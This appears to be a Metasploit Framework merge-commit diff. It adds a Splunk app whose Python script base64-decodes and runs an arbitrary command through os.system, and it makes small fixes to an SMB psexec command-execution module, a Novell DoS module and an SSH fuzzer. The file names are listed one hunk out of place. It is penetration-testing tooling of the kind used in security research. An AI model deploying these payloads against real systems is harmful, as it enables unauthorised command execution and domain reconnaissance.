Merge branch 'rapid7' into kernelsmith-RM7223-meterp-kill

Author: egypt

data/exploits/splunk/upload_app_exec.tgz

@@ -4,37 +4,42 @@ class ConvertBinary < ActiveRecord::Migration
 	class WebPage < ActiveRecord::Base
 		serialize :headers
 	end
-	
+
 	class WebVuln < ActiveRecord::Base
 		serialize :params
 	end
-		
+
 	def bfilter(str)
 		str = str.to_s
 		str.encoding = 'binary' if str.respond_to?('encoding=')
 		str.gsub(/[\x00\x7f-\xff]/, '')
 	end
-	
+
 	def self.up
 		rename_column :web_pages, :body, :body_text
 		rename_column :web_pages, :request, :request_text
 		rename_column :web_vulns, :request, :request_text
 		rename_column :web_vulns, :proof, :proof_text
-							
+
 		add_column :web_pages, :body, :binary
 		add_column :web_pages, :request, :binary
-		add_column :web_vulns, :request, :binary	
+		add_column :web_vulns, :request, :binary
 		add_column :web_vulns, :proof, :binary
-		
+
 		WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
 		WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
 		WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
 		WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
-				
+
 		remove_column :web_pages, :body_text
 		remove_column :web_pages, :request_text
 		remove_column :web_vulns, :request_text
 		remove_column :web_vulns, :proof_text
+
+		WebPage.connection.schema_cache.clear!
+		WebPage.reset_column_information
+		WebVuln.connection.schema_cache.clear!
+		WebVuln.reset_column_information
 	end
 
 	def self.down
@@ -43,21 +48,25 @@ def self.down
 		rename_column :web_pages, :request, :request_binary
 		rename_column :web_vulns, :request, :request_binary
 		rename_column :web_vulns, :proof, :proof_binary
-							
+
 		add_column :web_pages, :body, :text
 		add_column :web_pages, :request, :text
 		add_column :web_vulns, :request, :text
 		add_column :web_vulns, :proof, :text
-		
+
 		WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
 		WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
 		WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
 		WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
-				
+
 		remove_column :web_pages, :body_binary
 		remove_column :web_pages, :request_binary
 		remove_column :web_vulns, :request_binary
 		remove_column :web_vulns, :proof_binary
-			
+
+		WebPage.connection.schema_cache.clear!
+		WebPage.reset_column_information
+		WebVuln.connection.schema_cache.clear!
+		WebVuln.reset_column_information
 	end
 end

data/sql/migrate/20110422000000_convert_binary.rb

@@ -0,0 +1,15 @@
+import sys
+import base64
+import splunk.Intersplunk
+
+results = []
+
+try:
+        sys.modules['os'].system(base64.b64decode(sys.argv[1]))
+
+except:
+        import traceback
+        stack = traceback.format_exc()
+        results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
+
+splunk.Intersplunk.outputResults(results)

external/source/exploits/splunk/upload_app_exec/bin/msf_exec.py

@@ -0,0 +1,7 @@
+[launcher]
+author=Marc Wickenden
+description=Metasploit module spunk_upload_app_exec.rb
+version=1.3.3.7
+
+[ui]
+is_visible = true

external/source/exploits/splunk/upload_app_exec/default/app.conf

@@ -0,0 +1,7 @@
+[msf_exec]
+type = python
+filename = msf_exec.py
+local = false
+enableheader = false
+streaming = false
+perf_warn_limit = 0

external/source/exploits/splunk/upload_app_exec/default/commands.conf

@@ -0,0 +1,2 @@
+[commands]
+export = system

external/source/exploits/splunk/upload_app_exec/metadata/default.meta

@@ -22,7 +22,7 @@ def initialize(info = {})
 			'Description'    => %q{
 					This module uses a valid administrator username and password to execute an
 				arbitrary command on one or more hosts, using a similar technique than the "psexec"
-				utility provided by SysInternals. Daisy chaining commands wiht '&' does not work
+				utility provided by SysInternals. Daisy chaining commands with '&' does not work
 				and users shouldn't try it. This module is useful because it doesn't need to upload
 				any binaries to the target machine.
 			},
@@ -45,6 +45,7 @@ def initialize(info = {})
 			OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
 			OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),
 			OptString.new('RPORT', [true, 'The Target port', 445]),
+			OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),
 		], self.class)
 
 		deregister_options('RHOST')
@@ -56,7 +57,7 @@ def peer
 
 	# This is the main controle method
 	def run_host(ip)
-		text = "\\WINDOWS\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
+		text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
 		bat = "%WINDIR%\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
 		smbshare = datastore['SMBSHARE']
 
@@ -83,7 +84,7 @@ def execute_command(ip, text, bat)
 			execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
 			print_status("#{peer} - Executing the command...")
 			return psexec(execute)
-		rescue StandardError => exec_command_cerror
+		rescue StandardError => exec_command_error
 			print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
 			return false
 		end

modules/auxiliary/admin/smb/psexec_command.rb

@@ -25,7 +25,7 @@ def initialize(info = {})
 			'Author'         => [ 'juan vazquez' ],
 			'License'        => MSF_LICENSE,
 			'References'     => [
-				[ 'CVE', 'CVE-2012-4956' ],
+				[ 'CVE', '2012-4956' ],
 				[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]
 			],
 			'DisclosureDate' => 'Nov 16 2012'))

modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb

@@ -87,7 +87,7 @@ def run
 			end
 
 			if(not @banner)
-				print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.unpack("H*")[0]} ")
+				print_status("The service may have crashed (no banner): iteration:#{cnt-1} method=#{last_inp} string=#{last_str.to_s.unpack("H*")[0]} ")
 				return
 			end
 

modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb

@@ -25,7 +25,7 @@ def initialize
 			},
 			'References'   =>
 				[
-					[ 'CVE', 'CVE-2012-4958' ],
+					[ 'CVE', '2012-4958' ],
 					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]
 				],
 			'Author'       =>